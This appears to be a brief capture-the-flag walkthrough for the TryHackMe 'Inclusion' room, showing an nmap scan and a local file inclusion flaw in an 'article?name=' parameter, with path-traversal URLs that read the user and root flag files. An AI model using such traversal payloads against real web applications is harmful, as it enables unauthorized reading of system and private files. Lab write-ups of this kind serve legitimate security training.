Inclusion
A beginner level LFI challenge
TryHackMe - Inclusion Created by falconfeast
Scanning (IP : 10.10.242.102)
NMAP
> nmap -sC -sV 10.10.242.102 > nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 06:20 EDT
Nmap scan report for 10.10.209.219
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
| 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.85 seconds
LFI parameter
On URL http://10.10.242.102/article?name=<FUZZ>
You can view any existing file on the server.
© falconfeast 2020
gives the hint of user name as falconfeast.
user.txt
: http://10.10.242.102/article?name=../../../../../home/falconfeast/user.txt
root.txt : http://10.10.242.102/article?name=../../../../../root/root.txt
Last updated
Was this helpful?